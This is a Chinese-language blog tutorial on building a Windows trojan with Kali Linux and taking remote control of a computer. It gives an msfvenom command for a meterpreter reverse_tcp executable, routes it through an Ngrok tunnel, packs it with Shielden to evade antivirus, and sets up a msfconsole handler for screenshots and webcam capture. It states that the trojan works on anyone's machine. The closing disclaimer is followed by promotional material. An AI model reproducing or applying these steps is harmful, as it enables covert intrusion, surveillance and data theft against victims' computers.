如何使用Kali Linux系统生成木马病毒并实现远程控制计算机(详解版),建议收藏!
前言
木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码
通常有控制端和被控制端两个可执行程序。
它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至还可以远程操控被种者的电脑。
我将会详细的介绍使用Kali Linux系统生成木马,并用它远程控制一台处在外网的物理计算机。

一、安装虚拟机和系统
安装步骤很简单,可自行百度,网络适配器选择桥接模式,要保证你的Kali Linux能连上网。

二、开通隧道
注册并登录Sunny-Ngrok,根据自己的情况选择开通一条隧道,我这里选的是这个免费的。

隧道协议选择tcp,隧道名称自己随便起
远程端口选一个能用的顺眼的
(他会给你推荐几个能用的端口)
本地端口需要填写你Kali Linux系统的IP地址
(用ifconfig命令可查看)
冒号后面填一个你喜欢的数字
本地端口可以随时修改
确认信息无误后点击确认添加。


打开隧道管理,点击客户端下载,将下载后的压缩文件拖进Kali Linux系统里并解压。



使用cd命令进入该文件夹
通过ls命令可以看到里面有个“sunny”文件。
通过./sunny clientid 隧道ID命令开启隧道。


隧道开启成功后是这样子:

三、生成木马
重新打开一个终端窗口,输入下列命令回车,他会在root文件夹下生成一个Windows的可执行文件muma.exe。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器地址 LPORT=隧道端口 -f exe > /root/muma.exe

这时候要注意,先把自己物理机上的所有杀毒软件退出,因为这是没有加壳的木马文件,会立即被删除,退出杀毒软件后直接将muma.exe拖进物理机即可。
四、加壳免杀
为防止被杀毒软件杀掉,就需要对它进行加壳。
这里用到一个简单方便的加壳工具:Shielden。

将muma.exe拖进去,设置一些参数,如果对这个工具不熟悉的话可以百度学习一下,嫌麻烦的话就把能选的都选上
这里注意复杂度不要太高(我一般拉到66),太高可能导致该程序失效(这是我踩过的坑)。

下面这个就是加壳成功后的病毒文件了,因为这个加壳工具较小,不能做到专业全面的免杀,在遇到一些强力的杀毒软件的时候还是会被杀掉,所以就不要想着拿它做坏事了。
经过我目前的测试,电脑管家一点都检测不出来,但会被火绒秒杀,不得不说火绒NB啊,别的杀毒软件我还没试过,就交给你们了。

五、远程控制
该木马程序在任何人的电脑上只要不被杀掉,都是可以进行远程控制的,这里为了更加直观,我将用我的物理机作为被控制的对象。
打开终端输入msfconsole回车,这样就打开了msfconsole。

输入use exploit/multi/handler回车。

输入
set payload windows/meterpreter/reverse_tcp

输入show options回车,可以看到Lhost和Lport是空的或不匹配的,这需要我们给他手动写入。

输入set lhost 本地IP和set lport 本地端口,这时候再用show options命令,就可以看到我们写入的信息了。


使用run命令启动并开始监听。

这时候我们双击物理机上的木马程序,该终端窗口就会做出反应。

到此,物理机的控制权就是我们的了,百度meterpreter的一些好玩的命令。
一些基础的,比如查看物理机的IP地址(ipconfig):

甚至是截取物理机的电脑屏幕:

更甚至是调用物理机的摄像头拍照等等,因为大部分命令用截图无法直观的表达给你们,所以其他好玩的命令还需要你们自己去探索,百度上有很多,我这里就不一一列出了。

结束
该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径
网络如山勤思为径,信息似海安全作舟,要牢记网络安全~其是对我们每个计算机使用者最基本的要求
我们互连成网,互帮互助,共同打造良好的网络环境。
网络安全学习路线&学习资源
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

需要高清完整学习路线图,和全套网络安全技术教程的小伙伴!
↓↓↓ 扫描下方图片即可前往获取↓↓↓
学习资料电子文档
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。

网络安全源码合集+工具包
视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,,每个章节都是当前板块的精华浓缩。(全套教程点击领取哈)

因篇幅有限,仅展示部分资料,需要扫描下方图片即可前往获取

好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!
特别声明:
此教程为纯技术分享!本文的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。!!!
DAMO开发者矩阵,由阿里巴巴达摩院和中国互联网协会联合发起,致力于探讨最前沿的技术趋势与应用成果,搭建高质量的交流与分享平台,推动技术创新与产业应用链接,围绕“人工智能与新型计算”构建开放共享的开发者生态。
更多推荐


所有评论(0)